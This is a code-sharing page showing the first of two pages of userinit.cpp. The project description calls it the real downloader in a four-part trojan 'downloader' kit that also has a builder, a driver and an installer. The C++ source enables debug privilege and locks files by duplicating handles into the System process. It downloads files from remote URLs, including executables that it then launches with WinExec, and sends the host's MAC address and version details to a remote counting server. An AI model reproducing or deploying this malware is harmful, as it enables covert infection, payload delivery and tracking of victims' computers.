📄 userinit.cpp

📁 下载者包括四个工程： CDown：生成器 userinit：真正的下载者 Dat：驱动和下载者的安装程序 pass：驱动程序
💻 CPP
📖 第 1 页 / 共 2 页
字号:
12 下一页
// userinit.cpp : Defines the entry point for the application.
//

//#include "stdafx.h"
#include <windows.h>
//#include "resource.h"
#include "iphlpapi.h"
//#include "stdio.h"
#include <urlmon.h>
#include <shlwapi.h>

#pragma comment(linker, "/ALIGN:0x1000 /entry:main /MERGE:.text=.rdata")   

#include <Wininet.h> 
#pragma comment(lib,"Wininet.lib")

#pragma comment(lib,"shlwapi.lib")


typedef HRESULT (_stdcall *XXXURLDownloadToFile)(LPUNKNOWN,LPCSTR,LPCSTR,DWORD,LPBINDSTATUSCALLBACK); 

typedef HINTERNET (_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD); 

typedef HINTERNET (_stdcall *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD); 

typedef  BOOL (_stdcall *XXXInternetCloseHandle)(HINTERNET); 


void RaiseToDebugP()
{
	HANDLE hToken;
	HANDLE hProcess = GetCurrentProcess();
	if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
	{
		TOKEN_PRIVILEGES tkp;
		if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) )
		{
			tkp.PrivilegeCount = 1;
			tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
			
			BOOL bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0) ;
		}
		CloseHandle(hToken);
	} 
}

BOOL OccupyFile( LPCTSTR lpFileName )
{
	BOOL bRet;
	
	RaiseToDebugP();
	
	HANDLE hProcess = OpenProcess( PROCESS_DUP_HANDLE, FALSE, 4);
	
	if ( hProcess == NULL )
	{
		hProcess = OpenProcess( PROCESS_DUP_HANDLE, FALSE, 8);
		
		if ( hProcess == NULL )
			return FALSE;
	}
	
	HANDLE hFile;
	HANDLE hTargetHandle;
	
	hFile = CreateFile( lpFileName, GENERIC_READ, 0, NULL, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL, NULL); 
	
	
	if ( hFile == INVALID_HANDLE_VALUE )
	{
		CloseHandle( hProcess );
		return FALSE;
	}
	
	bRet = DuplicateHandle( GetCurrentProcess(), hFile, hProcess, &hTargetHandle, 
		0, FALSE, DUPLICATE_SAME_ACCESS|DUPLICATE_CLOSE_SOURCE);
	
	CloseHandle( hProcess );
	
	return bRet;
}


LPVOID MapFile(LPCTSTR lpFilePath, LPDWORD lpdwFileSize, BOOL bReadOnly)
{
	DWORD dwAccess[3];
	
	if ( bReadOnly )
	{
		dwAccess[0] = GENERIC_READ;
		dwAccess[1] = PAGE_READONLY;
		dwAccess[2] = FILE_MAP_READ;
	}
	else
	{
		dwAccess[0] = (GENERIC_WRITE | GENERIC_READ);
		dwAccess[1] = PAGE_READWRITE;
		dwAccess[2] = (FILE_MAP_READ | FILE_MAP_WRITE);
	}
	
	HANDLE hFile = CreateFile(lpFilePath, dwAccess[0], FILE_SHARE_READ,
		NULL, OPEN_EXISTING, 0, NULL);
	
	if ( hFile != INVALID_HANDLE_VALUE )
	{
		if ( lpdwFileSize != NULL )
		{
			*lpdwFileSize = GetFileSize(hFile, NULL);
		}
		
		HANDLE hFileMap = CreateFileMapping(hFile, NULL, dwAccess[1], 0, 0, NULL);
		CloseHandle(hFile);
		
		if ( hFileMap != NULL )
		{
			LPVOID lpFileData = MapViewOfFile(hFileMap, dwAccess[2], 0, 0, 0);
			CloseHandle(hFileMap);
			
			return lpFileData;
		}
	}
	
	return NULL;
}

void UnmapFile(LPVOID lpFileData)
{
	if ( lpFileData != NULL )
	{
		UnmapViewOfFile(lpFileData);
	}
}

LPVOID GetOverlayOffset(PVOID lpBuffer, DWORD dwSize, LPDWORD poutSize)
{
	PIMAGE_DOS_HEADER DosHeader;
	PIMAGE_NT_HEADERS NtHeader;
	PIMAGE_SECTION_HEADER SectHeader;
	
	DosHeader = (PIMAGE_DOS_HEADER)lpBuffer;
	
	if ( DosHeader->e_magic != IMAGE_DOS_SIGNATURE )
		return NULL;
	
	NtHeader = (PIMAGE_NT_HEADERS)( DosHeader->e_lfanew + (DWORD)DosHeader );
	if ( NtHeader->Signature != IMAGE_NT_SIGNATURE )
		return NULL;
	
	DWORD overlay = NULL;
	
	SectHeader = IMAGE_FIRST_SECTION(NtHeader);
	SectHeader += (NtHeader->FileHeader.NumberOfSections-1);
	
	overlay = SectHeader->PointerToRawData + SectHeader->SizeOfRawData + (DWORD)lpBuffer;
	if ( poutSize != NULL )
	{
		*poutSize = dwSize - (overlay -(DWORD)lpBuffer);
	}
	
	return (PVOID)overlay;
}

//
// 运行程序
//
BOOL RunProcess(LPCTSTR szFileName, BOOL bShow)
{
	STARTUPINFO		si = {0};
	PROCESS_INFORMATION		pi = {0};
	BOOL		bRet = FALSE;
	si.cb = sizeof(si);
	if ( bShow )
	{
		// 		si.wShowWindow = SW_SHOW;
		// 		si.dwFlags |= STARTF_USESHOWWINDOW;
		
		WinExec( szFileName, SW_SHOW);
	}
	else
		WinExec( szFileName, SW_HIDE);
	
	return bRet;
}

void DownloadFile(LPCTSTR lpszUrl, int iProcessNameNumber)
{
	BOOL	bIsIni = FALSE;
	LPTSTR	lpPostFix = strrchr(lpszUrl, '.');
	if ( lpPostFix == NULL )
		return;
	lpPostFix++;
	
	XXXURLDownloadToFile kkkkkk;
	HRESULT	hRes ;
	TCHAR	szTempDir[MAX_PATH];
	TCHAR	szTempExe[MAX_PATH];
	kkkkkk = (XXXURLDownloadToFile)GetProcAddress( LoadLibrary("urlmon.dll"), "URLDownloadToFileA");
	if ( kkkkkk == NULL )
		return;
	
	if ( stricmp(lpPostFix, "ini") == 0 || stricmp(lpPostFix, "txt") == 0 )
	{
		bIsIni = TRUE;
	}
	
	
	
	if (bIsIni)
	{
		// 是配置文件，则下载保存为down.txt	
        GetSystemDirectory(szTempDir, MAX_PATH);
		strcat(szTempDir, "\\down.txt");
		strcpy(szTempExe, szTempDir);
		
		// 循环300次
		for ( DWORD index = 0; index < 10; index++)
		{
			hRes = kkkkkk( NULL, lpszUrl, szTempExe, 0, NULL);
			if ( hRes == S_OK )
			{
				break;
			}
			Sleep(1000);
		}
		if ( index == 10 )
		{
			return;
		}

	}
	else
	{
        GetTempPath(MAX_PATH, szTempDir);
		GetTempFileName( szTempDir, "sv", iProcessNameNumber, szTempExe);
	
		// 循环10次
		for ( DWORD index = 0; index < 5; index++)
		{
			hRes = kkkkkk( NULL, lpszUrl, szTempExe, 0, NULL);
			if ( hRes == S_OK )
			{
				break;
			}
			Sleep(1000);
		}
		if ( index == 5)
		{
			return;
		}
	}
		
	if ( !bIsIni )
	{
		RunProcess(szTempExe, TRUE);
		return;
	}	

}

//
// 向向服务器发送本地主机的信息，包括：物理地址、杀软名称、系统版本号、ie版本号
//
BOOL RePortState(char *szDomain, char *Version, char *szMac)
{
	
	XXXInternetOpen tempInternetOpen;
	XXXInternetOpenUrl tempInternetOpenUrl;
	XXXInternetCloseHandle tempInternetCloseHandle;
	
	tempInternetOpen = (XXXInternetOpen)GetProcAddress( LoadLibrary("wininet.dll"), "InternetOpenA");
	tempInternetOpenUrl = (XXXInternetOpenUrl)GetProcAddress( LoadLibrary("wininet.dll"), "InternetOpenUrlA");
	tempInternetCloseHandle = (XXXInternetCloseHandle)GetProcAddress( LoadLibrary("wininet.dll"), "InternetCloseHandle");

	HINTERNET hropen=NULL;
	HINTERNET hropenurl=NULL;
	
	hropen=tempInternetOpen("GOOGLE",
		PRE_CONFIG_INTERNET_ACCESS,
		NULL,
		INTERNET_INVALID_PORT_NUMBER,
		0);
	if(hropen==NULL)
	{
		
		return FALSE;
	}

	
	char szSendBuf[MAX_PATH] = {0};
    char szFirstPartBuf[] = "clcount/count.asp?mac=";
    char szSendPartBuf[] = "&ver=";
	
	   
	// 构造数据包
	strcpy(szSendBuf, szDomain);
	strcat(szSendBuf, szFirstPartBuf);
	strcat(szSendBuf, szMac);
	strcat(szSendBuf, szSendPartBuf);
	strcat(szSendBuf, Version);
	
	hropenurl = tempInternetOpenUrl(hropen,
		szSendBuf,
		NULL,
		0,
		INTERNET_FLAG_RELOAD,
		0);
	if(hropenurl==NULL)
	{
		if(hropen)
		{
			tempInternetCloseHandle(hropen);
			hropen=NULL;
		}
		return FALSE;
	}
	return TRUE;
}

//
// 查找是否存在指定的标记
//
BOOL FindMarks(char *szIniFilePath, char *szInMark)
{
	int iRenturnValue = 0;
	
	char szGettedStr[10] = {0};
	int icount = 0;
	
	GetPrivateProfileString("localfile", "count","0",szGettedStr,sizeof(szGettedStr), szIniFilePath);
12 下一页
💿 文件大小 381 K
👤 上传用户 pangbo888
📂 所属分类其他行业
🏷️ 相关标签

#userinit #CDown #pass
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -